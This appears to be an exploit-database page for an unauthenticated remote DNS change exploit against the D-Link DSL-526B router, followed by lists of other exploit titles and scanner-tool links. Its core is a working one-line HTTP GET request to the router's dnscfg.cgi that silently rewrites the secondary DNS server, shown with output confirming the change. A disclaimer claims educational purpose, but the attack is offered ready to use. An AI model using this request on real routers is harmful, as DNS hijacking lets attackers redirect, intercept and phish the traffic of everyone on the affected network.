"D-Link DSL-526B ADSL2+ AU_2.01 - Remote DNS Change"

Author

Exploit author

"Todor Donev"

Platform

Exploit platform

hardware

Release date

Exploit published date

2015-06-08

                
                    
                         Download file
                    
                
            
D-Link DSL-526B ADSL2+ AU_2.01 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!

[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2"  
    var dns2 = '8.8.8.8';

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-11-30	"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure"	webapps	hardware	"Zagros Bingol"
2020-11-30	"Intelbras Router RF 301K 1.1.2 - Authentication Bypass"	webapps	hardware	"Kaio Amaral"
2020-11-27	"Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution"	webapps	hardware	"Emre SUREN"
2020-11-24	"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)"	webapps	hardware	maj0rmil4d
2020-11-23	"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass"	webapps	hardware	malwrforensics
2020-11-19	"Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification"	webapps	hardware	"Ricardo Longatto"
2020-11-19	"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure"	remote	hardware	"Nitesh Surana"
2020-11-16	"Cisco 7937G - DoS/Privilege Escalation"	remote	hardware	"Cody Martin"
2020-11-13	"ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)"	webapps	hardware	b1ack0wl
2020-11-13	"Citrix ADC NetScaler - Local File Inclusion (Metasploit)"	webapps	hardware	"RAMELLA Sebastien"

Release Date	Title	Type	Platform	Author
2020-02-24	"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure"	webapps	hardware	"Todor Donev"
2020-02-24	"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure"	webapps	hardware	"Todor Donev"
2020-02-24	"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure"	webapps	hardware	"Todor Donev"
2020-02-24	"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure"	webapps	hardware	"Todor Donev"
2020-02-24	"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure"	webapps	hardware	"Todor Donev"
2020-02-19	"DBPower C300 HD Camera - Remote Configuration Disclosure"	webapps	hardware	"Todor Donev"
2019-10-08	"Zabbix 4.4 - Authentication Bypass"	webapps	php	"Todor Donev"
2019-09-23	"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure"	remote	hardware	"Todor Donev"
2019-09-09	"WordPress 5.2.3 - Cross-Site Host Modification"	webapps	php	"Todor Donev"
2019-09-02	"IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read"	remote	hardware	"Todor Donev"
2019-09-02	"Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection"	remote	hardware	"Todor Donev"
2019-05-24	"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC"	webapps	php	"Todor Donev"
2018-07-11	"Awk to Perl 1.007-5 - Buffer Overflow (PoC)"	local	linux	"Todor Donev"
2018-06-22	"Opencart < 3.0.2.0 - Denial of Service"	dos	php	"Todor Donev"
2018-04-02	"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change"	webapps	hardware	"Todor Donev"
2018-03-30	"Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change"	webapps	asp	"Todor Donev"
2018-03-30	"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change"	webapps	asp	"Todor Donev"
2018-03-30	"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)"	webapps	asp	"Todor Donev"
2018-03-30	"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change"	webapps	asp	"Todor Donev"
2018-03-28	"Tenda N11 Wireless Router 5.07.43_en_NEX01 - Remote DNS Change"	webapps	hardware	"Todor Donev"
2018-01-17	"D-Link DSL-2640R - DNS Change"	webapps	hardware	"Todor Donev"
2017-06-18	"D-Link DSL-2640B ADSL Router - 'dnscfg' Remote DNS Change"	webapps	hardware	"Todor Donev"
2017-06-17	"Beetel BCM96338 Router - DNS Change"	webapps	hardware	"Todor Donev"
2017-06-17	"D-Link DSL-2640U - DNS Change"	webapps	hardware	"Todor Donev"
2017-06-17	"UTstarcom WA3002G4 - DNS Change"	webapps	hardware	"Todor Donev"
2017-06-16	"iBall Baton iB-WRA150N - DNS Change"	webapps	hardware	"Todor Donev"
2017-01-22	"SunOS 5.11 ICMP - Denial of Service"	dos	unix	"Todor Donev"
2017-01-19	"Tenda ADSL2/2+ Modem D820R - DNS Change"	webapps	hardware	"Todor Donev"
2017-01-19	"Pirelli DRG A115 v3 ADSL Router - DNS Change"	webapps	hardware	"Todor Donev"
2017-01-16	"Tenda ADSL2/2+ Modem D840R - DNS Change"	webapps	hardware	"Todor Donev"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"D-Link DSL-526B ADSL2+ AU_2.01 - Remote DNS Change"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.